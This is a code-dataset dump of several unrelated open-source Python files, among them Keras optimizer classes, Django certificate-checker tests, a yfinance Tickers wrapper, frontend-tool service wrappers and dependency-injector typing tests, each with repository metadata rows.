1. / (1. + self.decay * math_ops.cast(self.iterations,
K.dtype(self.decay))))
with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
t = math_ops.cast(self.iterations, K.floatx())
lr_t = lr / (1. - math_ops.pow(self.beta_1, t))
shapes = [K.int_shape(p) for p in params]
# zero init of 1st moment
ms = [K.zeros(shape) for shape in shapes]
# zero init of exponentially weighted infinity norm
us = [K.zeros(shape) for shape in shapes]
self.weights = [self.iterations] + ms + us
for p, g, m, u in zip(params, grads, ms, us):
m_t = (self.beta_1 * m) + (1. - self.beta_1) * g
u_t = math_ops.maximum(self.beta_2 * u, math_ops.abs(g))
p_t = p - lr_t * m_t / (u_t + self.epsilon)
self.updates.append(state_ops.assign(m, m_t))
self.updates.append(state_ops.assign(u, u_t))
new_p = p_t
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'beta_1': float(K.get_value(self.beta_1)),
'beta_2': float(K.get_value(self.beta_2)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(Adamax, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Nadam(Optimizer):
"""Nesterov Adam optimizer.
Much like Adam is essentially RMSprop with momentum,
Nadam is Adam RMSprop with Nesterov momentum.
Default parameters follow those provided in the paper.
It is recommended to leave the parameters of this optimizer
at their default values.
Arguments:
lr: float >= 0. Learning rate.
beta_1/beta_2: floats, 0 < beta < 1. Generally close to 1.
epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
"""
def __init__(self,
lr=0.002,
beta_1=0.9,
beta_2=0.999,
epsilon=None,
schedule_decay=0.004,
**kwargs):
super(Nadam, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.m_schedule = K.variable(1., name='m_schedule')
self.lr = K.variable(lr, name='lr')
self.beta_1 = K.variable(beta_1, name='beta_1')
self.beta_2 = K.variable(beta_2, name='beta_2')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.schedule_decay = schedule_decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = []
with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
t = math_ops.cast(self.iterations, K.floatx())
# Due to the recommendations in [2], i.e. warming momentum schedule
momentum_cache_t = self.beta_1 * (
1. - 0.5 *
(math_ops.pow(K.cast_to_floatx(0.96), t * self.schedule_decay)))
momentum_cache_t_1 = self.beta_1 * (
1. - 0.5 *
(math_ops.pow(K.cast_to_floatx(0.96), (t + 1) * self.schedule_decay)))
m_schedule_new = self.m_schedule * momentum_cache_t
m_schedule_next = self.m_schedule * momentum_cache_t * momentum_cache_t_1
self.updates.append((self.m_schedule, m_schedule_new))
shapes = [K.int_shape(p) for p in params]
ms = [K.zeros(shape) for shape in shapes]
vs = [K.zeros(shape) for shape in shapes]
self.weights = [self.iterations, self.m_schedule] + ms + vs
for p, g, m, v in zip(params, grads, ms, vs):
# the following equations given in [1]
g_prime = g / (1. - m_schedule_new)
m_t = self.beta_1 * m + (1. - self.beta_1) * g
m_t_prime = m_t / (1. - m_schedule_next)
v_t = self.beta_2 * v + (1. - self.beta_2) * math_ops.square(g)
v_t_prime = v_t / (1. - math_ops.pow(self.beta_2, t))
m_t_bar = (
1. - momentum_cache_t) * g_prime + momentum_cache_t_1 * m_t_prime
self.updates.append(state_ops.assign(m, m_t))
self.updates.append(state_ops.assign(v, v_t))
p_t = p - self.lr * m_t_bar / (K.sqrt(v_t_prime) + self.epsilon)
new_p = p_t
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'beta_1': float(K.get_value(self.beta_1)),
'beta_2': float(K.get_value(self.beta_2)),
'epsilon': self.epsilon,
'schedule_decay': self.schedule_decay
}
base_config = super(Nadam, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class TFOptimizer(Optimizer, checkpointable.Checkpointable):
"""Wrapper class for native TensorFlow optimizers.
"""
def __init__(self, optimizer, iterations=None): # pylint: disable=super-init-not-called
self.optimizer = optimizer
self._track_checkpointable(optimizer, name='optimizer')
if iterations is None:
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
else:
self.iterations = iterations
self._track_checkpointable(self.iterations, name='global_step')
def apply_gradients(self, grads):
self.optimizer.apply_gradients(grads, global_step=self.iterations)
def get_grads(self, loss, params):
return self.optimizer.compute_gradients(loss, params)
def get_updates(self, loss, params):
if distribution_strategy_context.has_strategy():
self.updates = []
if not params:
# After the model vars have been created, the second call to get_updates
# is called with params as an empty list. This ensures that we call
# compute_gradients with params=None.
grads = self.optimizer.compute_gradients(loss)
else:
grads = self.optimizer.compute_gradients(loss, params)
global_step = training_util.get_global_step()
opt_update = self.optimizer.apply_gradients(grads, global_step)
else:
if not params:
self.updates = [state_ops.assign_add(self.iterations, 1)]
return self.updates
# Updates list starts out empty because the iterations variable is
# incremented in optimizer.apply_gradients()
self.updates = []
grads = self.optimizer.compute_gradients(loss, params)
opt_update = self.optimizer.apply_gradients(
grads, global_step=self.iterations)
self.updates.append(opt_update)
return self.updates
@property
def weights(self):
raise NotImplementedError
def get_config(self):
raise NotImplementedError
def from_config(self, config):
raise NotImplementedError
# Aliases.
sgd = SGD
rmsprop = RMSprop
adagrad = Adagrad
adadelta = Adadelta
adam = Adam
adamax = Adamax
nadam = Nadam
@keras_export('keras.optimizers.serialize')
def serialize(optimizer):
return serialize_keras_object(optimizer)
@keras_export('keras.optimizers.deserialize')
def deserialize(config, custom_objects=None):
"""Inverse of the `serialize` function.
Arguments:
config: Optimizer configuration dictionary.
custom_objects: Optional dictionary mapping
names (strings) to custom objects
(classes and functions)
to be considered during deserialization.
Returns:
A Keras Optimizer instance.
"""
all_classes = {
'adadelta': adadelta_v2.Adadelta,
'adagrad': adagrad_v2.Adagrad,
'adam': adam_v2.Adam,
'adamax': adamax_v2.Adamax,
'nadam': nadam_v2.Nadam,
'rmsprop': rmsprop_v2.RMSprop,
'sgd': gradient_descent_v2.SGD
}
# Make deserialization case-insensitive for built-in optimizers.
if config['class_name'].lower() in all_classes:
config['class_name'] = config['class_name'].lower()
return deserialize_keras_object(
config,
module_objects=all_classes,
custom_objects=custom_objects,
printable_module_name='optimizer')
@keras_export('keras.optimizers.get')
def get(identifier):
"""Retrieves a Keras Optimizer instance.
Arguments:
identifier: Optimizer identifier, one of
- String: name of an optimizer
- Dictionary: configuration dictionary.
- Keras Optimizer instance (it will be returned unchanged).
- TensorFlow Optimizer instance
(it will be wrapped as a Keras Optimizer).
Returns:
A Keras Optimizer instance.
Raises:
ValueError: If `identifier` cannot be interpreted.
"""
if isinstance(identifier, (Optimizer, optimizer_v2.OptimizerV2)):
return identifier
# Wrap TF optimizer instances
elif isinstance(identifier, tf_optimizer_module.Optimizer):
opt = TFOptimizer(identifier)
K.track_tf_optimizer(opt)
return opt
elif isinstance(identifier, dict):
return deserialize(identifier)
elif isinstance(identifier, six.string_types):
config = {'class_name': str(identifier), 'config': {}}
return deserialize(config)
else:
raise ValueError('Could not interpret optimizer identifier:', identifier)
| 35.387588 | 145 | 0.651865 |
c062f97c95e76a51c19732326cb41d645d78afe8 | 2,189 | py | Python | tests/test_data.py | sarvjeets/lakshmi | 8cd6e47f23a61c5b8c967f9fdc756df296f1e0d5 | [
"MIT"
] | 59 | 2021-09-07T05:19:30.000Z | 2022-02-24T18:29:49.000Z | tests/test_data.py | sarvjeets/lakshmi | 8cd6e47f23a61c5b8c967f9fdc756df296f1e0d5 | [
"MIT"
] | 4 | 2021-08-01T18:32:51.000Z | 2022-02-26T19:14:37.000Z | tests/test_data.py | sarvjeets/lakshmi | 8cd6e47f23a61c5b8c967f9fdc756df296f1e0d5 | [
"MIT"
] | 3 | 2021-08-01T04:35:07.000Z | 2022-03-23T21:48:51.000Z | """Tests for lakshmi/data directory. Simply checks if the files parses."""
import unittest
from pathlib import Path
import yaml
import lakshmi
class DataTest(unittest.TestCase):
def parse_dict(self, filename, function):
file_path = (Path(__file__).parents[1].absolute() / filename)
d = yaml.load(file_path.read_text(), Loader=yaml.SafeLoader)
return function(d)
def test_account(self):
self.assertIsNotNone(self.parse_dict('lakshmi/data/Account.yaml',
lakshmi.Account.from_dict))
def test_asset_class(self):
self.assertIsNotNone(self.parse_dict('lakshmi/data/AssetClass.yaml',
lakshmi.AssetClass.from_dict))
def test_ee_bonds(self):
self.assertIsNotNone(self.parse_dict('lakshmi/data/EEBonds.yaml',
lakshmi.assets.EEBonds.from_dict))
def test_i_bonds(self):
self.assertIsNotNone(self.parse_dict('lakshmi/data/IBonds.yaml',
lakshmi.assets.IBonds.from_dict))
def test_manual_asset(self):
self.assertIsNotNone(
self.parse_dict(
'lakshmi/data/ManualAsset.yaml',
lakshmi.assets.ManualAsset.from_dict))
def test_ticker_asset(self):
self.assertIsNotNone(
self.parse_dict(
'lakshmi/data/TickerAsset.yaml',
lakshmi.assets.TickerAsset.from_dict))
def test_vanguard_fund(self):
self.assertIsNotNone(
self.parse_dict(
'lakshmi/data/VanguardFund.yaml',
lakshmi.assets.VanguardFund.from_dict))
def test_checkpoint(self):
self.assertIsNotNone(
self.parse_dict(
'lakshmi/data/Checkpoint.yaml',
lambda x: lakshmi.performance.Checkpoint.from_dict(
x, date='2021/01/01')))
def test_portfolio(self):
self.assertIsNotNone(self.parse_dict('docs/portfolio.yaml',
lakshmi.Portfolio.from_dict))
if __name__ == '__main__':
unittest.main()
| 34.203125 | 79 | 0.596619 |
b1195e0c9f4d85a50906b06f6c77195939bbdf9e | 5,556 | py | Python | check/tests.py | uktrade/cert-checker | 7b8fc2c26fd162a10e847d05bc253c30659147c0 | [
"MIT"
] | null | null | null | check/tests.py | uktrade/cert-checker | 7b8fc2c26fd162a10e847d05bc253c30659147c0 | [
"MIT"
] | 1 | 2018-08-28T12:13:10.000Z | 2018-08-28T12:13:10.000Z | check/tests.py | uktrade/cert-checker | 7b8fc2c26fd162a10e847d05bc253c30659147c0 | [
"MIT"
] | null | null | null | import datetime as dt
from django.test import TestCase, RequestFactory
from .models import Domain
from .views import PingdomErrorView, PingdomWarningView, PingdomHealthCheckView
def current_time():
return dt.datetime.now(dt.timezone.utc)
def domain_factory(**kwargs):
default = {
'last_checked': current_time()-dt.timedelta(days=2),
'name': 'testing.com',
'port': '443',
'status': Domain.OK,
'status_text': ''
}
default.update(kwargs)
return Domain.objects.create(**default)
class PingdomHealthCheckViewTestCase(TestCase):
def setUp(self):
self.factory = RequestFactory()
def test_cron_job_has_not_run_recently_error(self):
request = self.factory.get('/pingdom/healthcheck/')
response = PingdomHealthCheckView.as_view()(request)
self.assertContains(response, 'DOWN')
def test_cron_job_has_run_recently_ok(self):
domain_factory(last_checked=current_time()-dt.timedelta(minutes=20))
request = self.factory.get('/pingdom/healthcheck/')
response = PingdomHealthCheckView.as_view()(request)
self.assertContains(response, 'OK')
class PingdomWarningViewTestCase(TestCase):
def test_has_warnings(self):
domain_factory(status=Domain.WARNING)
request = RequestFactory().get('/pingdom/warnings/')
response = PingdomWarningView.as_view()(request)
self.assertContains(response, 'DOWN')
self.assertEqual(response.status_code, 200)
def test_has_warnings_false(self):
request = RequestFactory().get('/pingdom/warnings/')
response = PingdomWarningView.as_view()(request)
self.assertContains(response, 'OK')
class PingdomErrorViewTestCase(TestCase):
def test_has_errors(self):
domain_factory(status=Domain.ERROR)
request = RequestFactory().get('/pingdom/errors/')
response = PingdomErrorView.as_view()(request)
self.assertContains(response, 'DOWN')
self.assertEqual(response.status_code, 200)
def test_has_errors_false(self):
request = RequestFactory().get('/pingdom/errors/')
response = PingdomErrorView.as_view()(request)
self.assertContains(response, 'OK')
self.assertEqual(response.status_code, 200)
class DomainModelTestCase(TestCase):
def test_has_errors_true(self):
domain_factory(status=Domain.ERROR)
self.assertTrue(Domain.objects.has_errors())
self.assertFalse(Domain.objects.has_warnings())
def test_has_warnings_true(self):
domain_factory(status=Domain.WARNING)
self.assertFalse(Domain.objects.has_errors())
self.assertTrue(Domain.objects.has_warnings())
def test_has_check_run_recently_true(self):
domain_factory(last_checked=current_time()-dt.timedelta(minutes=20))
self.assertTrue(Domain.objects.has_check_run_recently())
def test_has_check_run_recently_false(self):
self.assertFalse(Domain.objects.has_check_run_recently())
def test_get_domain_check_list(self):
domain_factory(
name='domain1', last_checked=current_time()-dt.timedelta(minutes=240), status=Domain.ERROR)
domain_factory(
name='domain2', last_checked=current_time()-dt.timedelta(minutes=30), status=Domain.ERROR)
domain_factory(
name='domain3', last_checked=current_time()-dt.timedelta(hours=25), status=Domain.OK)
domain_factory(
name='domain4', last_checked=current_time()-dt.timedelta(hours=20), status=Domain.OK)
domain_factory(
name='domain5', last_checked=current_time()-dt.timedelta(minutes=200), status=Domain.WARNING)
domain_factory(
name='domain6', last_checked=current_time()-dt.timedelta(minutes=30), status=Domain.WARNING)
domain_factory(
name='domain7', last_checked=None, status=Domain.NOTCHECKED
)
domains = set(Domain.objects.get_domain_check_list().values_list('name', flat=True))
self.assertEqual({'domain1', 'domain3', 'domain5', 'domain7'}, domains)
def test_update_supresses_status(self):
domain = domain_factory()
status_text = [
('warning', 'More alternate names than specified ...'),
]
domain = Domain.objects.update_domain_status(
[domain.domain_name()], current_time()+dt.timedelta(days=30), status_text)
self.assertEqual(domain.status, Domain.OK)
def test_update_records_last_checked_timestamp(self):
domain = domain_factory()
last_checked = domain.last_checked
domain = Domain.objects.update_domain_status(
[domain.domain_name()], current_time()-dt.timedelta(days=30), [])
self.assertNotEqual(last_checked, domain.last_checked)
def test_expired_cert_recorded_as_error(self):
domain = domain_factory()
domain = Domain.objects.update_domain_status(
[domain.domain_name()], current_time() - dt.timedelta(days=1), [])
self.assertEqual(domain.status, Domain.ERROR)
self.assertIn(domain.status_text, 'error: certificate has expired')
def test_nearly_expiring_cert_recorded_as_warning(self):
domain = domain_factory()
domain = Domain.objects.update_domain_status(
[domain.domain_name()], current_time()+dt.timedelta(days=5), [])
self.assertEqual(domain.status, Domain.WARNING)
self.assertEqual(domain.status_text, 'warning: certificate is due to expire soon')
| 33.46988 | 105 | 0.689525 |
ba986819c04d1f2156504824ff4fb709cd23f41b | 743 | py | Python | client/verta/verta/_swagger/_public/uac/model/RoleActionEnumRoleServiceActions.py | stefan-petrov-toptal/modeldb | a8a9b9da6ed964c91351230b2f0d2703c75794de | [
"Apache-2.0"
] | 835 | 2017-02-08T20:14:24.000Z | 2020-03-12T17:37:49.000Z | client/verta/verta/_swagger/_public/uac/model/RoleActionEnumRoleServiceActions.py | stefan-petrov-toptal/modeldb | a8a9b9da6ed964c91351230b2f0d2703c75794de | [
"Apache-2.0"
] | 651 | 2019-04-18T12:55:07.000Z | 2022-03-31T23:45:09.000Z | client/verta/verta/_swagger/_public/uac/model/RoleActionEnumRoleServiceActions.py | stefan-petrov-toptal/modeldb | a8a9b9da6ed964c91351230b2f0d2703c75794de | [
"Apache-2.0"
] | 170 | 2017-02-13T14:49:22.000Z | 2020-02-19T17:59:12.000Z | # THIS FILE IS AUTO-GENERATED. DO NOT EDIT
from verta._swagger.base_type import BaseType
class RoleActionEnumRoleServiceActions(BaseType):
_valid_values = [
"UNKNOWN",
"ALL",
"GET_BY_ID",
"GET_BY_NAME",
"CREATE",
"UPDATE",
"LIST",
"DELETE",
]
def __init__(self, val):
if val not in RoleActionEnumRoleServiceActions._valid_values:
raise ValueError('{} is not a valid value for RoleActionEnumRoleServiceActions'.format(val))
self.value = val
def to_json(self):
return self.value
def from_json(v):
if isinstance(v, str):
return RoleActionEnumRoleServiceActions(v)
else:
return RoleActionEnumRoleServiceActions(RoleActionEnumRoleServiceActions._valid_values[v])
| 24.766667 | 98 | 0.709287 |
65fc4c6b08375688e7aa70ff86203458179f848c | 1,322 | py | Python | newsltd_etl/shared/schema/catalog/chronicle.py | telia-oss/birgitta-example-etl | 8bb32aac94486b4edc1fee3964cf7d2dcf095020 | [
"MIT"
] | 8 | 2019-11-25T16:39:33.000Z | 2022-03-31T12:48:54.000Z | newsltd_etl/shared/schema/catalog/chronicle.py | telia-oss/birgitta-example-etl | 8bb32aac94486b4edc1fee3964cf7d2dcf095020 | [
"MIT"
] | 218 | 2019-09-09T11:11:59.000Z | 2022-03-08T05:16:40.000Z | newsltd_etl/shared/schema/catalog/chronicle.py | telia-oss/birgitta-example-etl | 8bb32aac94486b4edc1fee3964cf7d2dcf095020 | [
"MIT"
] | 4 | 2020-07-21T15:33:40.000Z | 2021-12-22T11:32:45.000Z | from birgitta.fields.catalog import Catalog
from ...schema.fixtures.values import chronicle as cv
catalog = Catalog()
catalog.add_field(
'groupid',
example=cv.groupid(),
description='Chronicle group id'
)
catalog.add_field(
'accountid',
example=cv.accountid(),
description='Chronicle account id'
)
catalog.add_field(
'chronicle_account_id',
example=cv.accountid(),
description='Chronicle account id'
)
catalog.add_field(
'cellphone',
example=cv.cellphone(),
description='Chronicle phone number'
)
catalog.add_field(
'enddate_yyyymmdd',
example=cv.enddate_yyyymmdd(),
description='Chronicle contract end date.'
)
catalog.add_field(
'startdate_yyyymmdd',
example=cv.startdate_yyyymmdd(),
description='Chronicle contract start date.'
)
catalog.add_field(
'priceplan_code',
example=cv.priceplan_code(),
description='Chronicle code of the priceplan'
)
catalog.add_field(
'priceplan_price',
example=cv.priceplan_price(),
description='Chronicle price of the priceplan'
)
catalog.add_field(
'status',
example=0,
description='Chronicle client status. 1 is active. 2 is inactive. 4 is discontinued.' # noqa E501
)
catalog.add_field(
'customerid',
example=cv.customer_id(),
description='Chronicle client id'
)
| 23.192982 | 101 | 0.71407 |
bbffe331ae78db1cb195eb77ac0e42dcb4014ea1 | 3,957 | py | Python | yfinance/tickers.py | pchaganti/yfinance | 8a8298044c117bb94bb48ccc85f6568516135465 | [
"Apache-2.0"
] | null | null | null | yfinance/tickers.py | pchaganti/yfinance | 8a8298044c117bb94bb48ccc85f6568516135465 | [
"Apache-2.0"
] | null | null | null | yfinance/tickers.py | pchaganti/yfinance | 8a8298044c117bb94bb48ccc85f6568516135465 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Yahoo! Finance market data downloader (+fix for Pandas Datareader)
# https://github.com/ranaroussi/yfinance
#
# Copyright 2017-2019 Ran Aroussi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import requests as _requests
from . import Ticker, multi
from collections import namedtuple as _namedtuple
from yliveticker import YLiveTicker
def genTickers(tickers):
tickers = tickers if isinstance(
tickers, list) else tickers.replace(',', ' ').split()
tickers = [ticker.upper() for ticker in tickers]
ticker_objects = {}
for ticker in tickers:
ticker_objects[ticker] = Ticker(ticker)
return _namedtuple("Tickers", ticker_objects.keys()
)(*ticker_objects.values())
class Tickers():
def __repr__(self):
return 'yfinance.Tickers object <%s>' % ",".join(self.symbols)
def __init__(self, tickers):
tickers = tickers if isinstance(
tickers, list) else tickers.replace(',', ' ').split()
self.symbols = [ticker.upper() for ticker in tickers]
ticker_objects = {}
self.session = _requests.Session()
for ticker in self.symbols:
ticker_objects[ticker] = Ticker(ticker,self.session)
self.tickers = ticker_objects
# self.tickers = _namedtuple(
# "Tickers", ticker_objects.keys(), rename=True
# )(*ticker_objects.values())
def history(self, period="1mo", interval="1d",
start=None, end=None, prepost=False,
actions=True, auto_adjust=True, proxy=None,
threads=True, group_by='column', progress=True,
**kwargs):
return self.download(
period, interval,
start, end, prepost,
actions, auto_adjust, proxy,
threads, group_by, progress,
**kwargs)
def download(self, period="1mo", interval="1d",
start=None, end=None, prepost=False,
actions=True, auto_adjust=True, proxy=None,
threads=True, group_by='column', progress=True,
**kwargs):
data = multi.download(self.symbols, session=self.session,
start=start, end=end,
actions=actions,
auto_adjust=auto_adjust,
period=period,
interval=interval,
prepost=prepost,
proxy=proxy,
group_by='ticker',
threads=threads,
progress=progress,
**kwargs)
for symbol in self.symbols:
self.tickers.get(symbol, {})._history = data[symbol]
if group_by == 'column':
data.columns = data.columns.swaplevel(0, 1)
data.sort_index(level=0, axis=1, inplace=True)
return data
def live(self,
on_ticker=None,
on_error=None,
on_close=None,
enable_socket_trace=False):
YLiveTicker(ticker_names=self.symbols,
on_ticker=on_ticker,
on_close=on_close,
on_error=on_error,
enable_socket_trace=enable_socket_trace)
| 34.408696 | 74 | 0.575941 |
ec722b1aeed5106b395d1dfc9f31482926f0f34e | 352 | py | Python | ex3.py | Oliviaha/python-the-hardway | 680ed0594878507b368ece0e58f87a6126746dcf | [
"MIT"
] | null | null | null | ex3.py | Oliviaha/python-the-hardway | 680ed0594878507b368ece0e58f87a6126746dcf | [
"MIT"
] | 1 | 2019-11-10T17:37:00.000Z | 2019-11-10T17:37:26.000Z | ex3.py | Oliviaha/python-the-hardway | 680ed0594878507b368ece0e58f87a6126746dcf | [
"MIT"
] | null | null | null | # -*-coding: utf-8 -*-
print "닭을 세어 봅시다."
print "암탉", 25+30 / 6
print "수탉", 100-25 * 3 % 4
print "이제 달걀도 세어 봅시다."
print 3+2+1-5+4%2-1 / 4+6
print "3+2 < 5-7 는 참인가요?"
print 3+2 <5-7
print "3+2 는 얼마죠?", 3+2
print "5-7은 얼마죠?", 5-7
print "아하 이게 False인 이유네요"
print "더 해볼까요."
print "더 큰가요??", 5 > -2
print "더 크거나 같나요?", 5>= -2
print "더 작거나 같나요?", 5<= -2 | 17.6 | 26 | 0.551136 |
53e6b4d72a1b7b850319e10ac601ac47e1ed32ef | 3,702 | py | Python | django_frontend_tools/services/__init__.py | markfinger/django-frontend-tools | 442f7e2267d96572ed0065ba192a906499ff3741 | [
"MIT"
] | null | null | null | django_frontend_tools/services/__init__.py | markfinger/django-frontend-tools | 442f7e2267d96572ed0065ba192a906499ff3741 | [
"MIT"
] | null | null | null | django_frontend_tools/services/__init__.py | markfinger/django-frontend-tools | 442f7e2267d96572ed0065ba192a906499ff3741 | [
"MIT"
] | null | null | null | import os
import sys
import json
import hashlib
from django.utils import six
from django.conf import settings
from django_node import npm
from django_node.base_service import BaseService
from django_node.exceptions import NodeServiceError
from ..settings import CACHE_AUTOPREFIXER, CACHE_LESS, CACHE_COMPRESSED_CSS, CACHE_COMPRESSED_JS
from ..exceptions import (
MissingArgumentError, AutoprefixerError, LessCompileError, CSSCompressionError, JSCompressionError
)
# Temp fix so that the services are only installed once
# TODO: fix in django-node and backport
npm.install(os.path.dirname(__file__))
class CachedService(BaseService):
CACHE = True
def generate_cache_key(self, serialized_data, data):
if self.CACHE:
return hashlib.sha256(serialized_data).hexdigest()
class AutoprefixerService(CachedService):
path_to_source = os.path.join(os.path.dirname(__file__), 'autoprefixer.js')
CACHE = CACHE_AUTOPREFIXER
def autoprefix(self, css, options=None):
params = {
'css': css
}
if options is not None:
params['options'] = json.dumps(options)
try:
response = self.send(**params)
except NodeServiceError as e:
six.reraise(AutoprefixerError, AutoprefixerError(*e.args), sys.exc_info()[2])
return response.text
class LessService(CachedService):
path_to_source = os.path.join(os.path.dirname(__file__), 'less.js')
CACHE = CACHE_LESS
def compile(self, path_to_file, options=None):
params = {
'path_to_file': path_to_file
}
if options is not None:
params['options'] = json.dumps(options)
try:
response = self.send(**params)
except NodeServiceError as e:
six.reraise(LessCompileError, LessCompileError(*e.args), sys.exc_info()[2])
return response.text
class CompressCSSService(CachedService):
path_to_source = os.path.join(os.path.dirname(__file__), 'compress_css.js')
CACHE = CACHE_COMPRESSED_CSS
def compress(self, css, path_to_file=None, options=None, prepend_to_relative_urls=None):
params = {}
if css is not None:
params['css'] = css
elif path_to_file is not None:
params['path_to_file'] = path_to_file
else:
raise MissingArgumentError('compress_css requires either `css` or `path_to_file` arguments to be defined')
if options is not None:
params['options'] = json.dumps(options)
if prepend_to_relative_urls is not None:
params['prepend_to_relative_urls'] = prepend_to_relative_urls
try:
response = self.send(**params)
except NodeServiceError as e:
six.reraise(CSSCompressionError, CSSCompressionError(*e.args), sys.exc_info()[2])
return response.text
class CompressJSService(CachedService):
path_to_source = os.path.join(os.path.dirname(__file__), 'compress_js.js')
CACHE = CACHE_COMPRESSED_JS
def compress(self, js, path_to_file=None, options=None):
params = {}
if js is not None:
params['js'] = js
elif path_to_file is not None:
params['path_to_file'] = path_to_file
else:
raise MissingArgumentError('compress_js requires either `js` or `path_to_file` arguments to be defined')
if options is not None:
params['options'] = json.dumps(options)
try:
response = self.send(**params)
except NodeServiceError as e:
six.reraise(JSCompressionError, JSCompressionError(*e.args), sys.exc_info()[2])
return response.text
| 30.85 | 118 | 0.667477 |
c5e17817820367d703e0a94146bd9418cb813849 | 1,371 | py | Python | Route.py | axydavid/Maze-Robot | 9cf26f4894ad735d6ba60bd8c5a3d991c77fb23a | [
"MIT"
] | null | null | null | Route.py | axydavid/Maze-Robot | 9cf26f4894ad735d6ba60bd8c5a3d991c77fb23a | [
"MIT"
] | null | null | null | Route.py | axydavid/Maze-Robot | 9cf26f4894ad735d6ba60bd8c5a3d991c77fb23a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 02 12:03:17 2015
@author: Dong
"""
class Route:
def __init__(self, file_name): # "route.txt"
self.file_name = file_name
def get_routeList(self):
count = 0
routeList = []
route = open( self.file_name, "r")
route.seek(0, 2)
size = route.tell()
print "Read String is : %i" % size
route.seek(0, 0)
while count < (size+1)/8:
count+=1
gridData = []
count1 = 6
while count1 != 0:
str = route.read(1)
if str.isspace() == False:
count1-=1
strInt = int(str)
print "Read String is : %i" % strInt
gridData.append(strInt)
routeList.append(gridData)
route.close()
return routeList
# Test code:
#for gridData in Route("testStraightLine.txt").get_routeList():
#
# print gridData
| 17.1375 | 63 | 0.355215 |
e70ae67a123615c05bfdccf47d34faa5e398506a | 2,461 | py | Python | tests/typing/resource.py | VKFisher/python-dependency-injector | c26b260c73ab36985e05e117af934ca6170ff9de | [
"BSD-3-Clause"
] | null | null | null | tests/typing/resource.py | VKFisher/python-dependency-injector | c26b260c73ab36985e05e117af934ca6170ff9de | [
"BSD-3-Clause"
] | null | null | null | tests/typing/resource.py | VKFisher/python-dependency-injector | c26b260c73ab36985e05e117af934ca6170ff9de | [
"BSD-3-Clause"
] | null | null | null | from typing import List, Iterator, Generator, AsyncIterator, AsyncGenerator, Optional
from dependency_injector import providers, resources
# Test 1: to check the return type with function
def init1() -> List[int]:
return []
provider1 = providers.Resource(init1)
var1: List[int] = provider1()
# Test 2: to check the return type with iterator
def init2() -> Iterator[List[int]]:
yield []
provider2 = providers.Resource(init2)
var2: List[int] = provider2()
# Test 3: to check the return type with generator
def init3() -> Generator[List[int], None, None]:
yield []
provider3 = providers.Resource(init3)
var3: List[int] = provider3()
# Test 4: to check the return type with resource subclass
class MyResource4(resources.Resource[List[int]]):
def init(self, *args, **kwargs) -> List[int]:
return []
def shutdown(self, resource: Optional[List[int]]) -> None:
...
provider4 = providers.Resource(MyResource4)
var4: List[int] = provider4()
# Test 5: to check the return type with async function
async def init5() -> List[int]:
...
provider5 = providers.Resource(init5)
async def _provide5() -> None:
var1: List[int] = await provider5() # type: ignore
var2: List[int] = await provider5.async_()
# Test 6: to check the return type with async iterator
async def init6() -> AsyncIterator[List[int]]:
yield []
provider6 = providers.Resource(init6)
async def _provide6() -> None:
var1: List[int] = await provider6() # type: ignore
var2: List[int] = await provider6.async_()
# Test 7: to check the return type with async generator
async def init7() -> AsyncGenerator[List[int], None]:
yield []
provider7 = providers.Resource(init7)
async def _provide7() -> None:
var1: List[int] = await provider7() # type: ignore
var2: List[int] = await provider7.async_()
# Test 8: to check the return type with async resource subclass
class MyResource8(resources.AsyncResource[List[int]]):
async def init(self, *args, **kwargs) -> List[int]:
return []
async def shutdown(self, resource: Optional[List[int]]) -> None:
...
provider8 = providers.Resource(MyResource8)
async def _provide8() -> None:
var1: List[int] = await provider8() # type: ignore
var2: List[int] = await provider8.async_()
# Test 9: to check string imports
provider9: providers.Resource[dict] = providers.Resource("builtins.dict")
provider9.set_provides("builtins.dict")
| 23.438095 | 85 | 0.687525 |
32941effd5de1a1c804ca9eda3218d1cb7c7eae3 | 908 | py | Python | tests/analyzers/test_annotation_detector.py | WebArchivCZ/WA-KAT | 719f7607222f5a4d917c535b2da6371184222101 | [
"MIT"
] | 3 | 2017-03-23T12:59:21.000Z | 2017-11-22T08:23:14.000Z | tests/analyzers/test_annotation_detector.py | WebArchivCZ/WA-KAT | 719f7607222f5a4d917c535b2da6371184222101 | [
"MIT"
] | 89 | 2015-06-28T22:10:28.000Z | 2017-01-30T16:06:05.000Z | tests/analyzers/test_annotation_detector.py | WebarchivCZ/WA-KAT | 719f7607222f5a4d917c535b2da6371184222101 | [
"MIT"
] | 1 | 2015-12-17T02:56:59.000Z | 2015-12-17T02:56:59.000Z | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: python 2.7
#
# Imports =====================================================================
from wa_kat.analyzers.annotation_detector import get_annotation_tags
# Variables ===================================================================
TEST_TEMPLATE = """
<HTML>
<head>
<meta name="description"
content="Popis stránek.">.
<meta name = "DC.Description"
content = "Description of the web.">
</head>
<body>
Somecontent.
</body>
</HTML>
"""
# Tests =======================================================================
def test_get_annotation_tags():
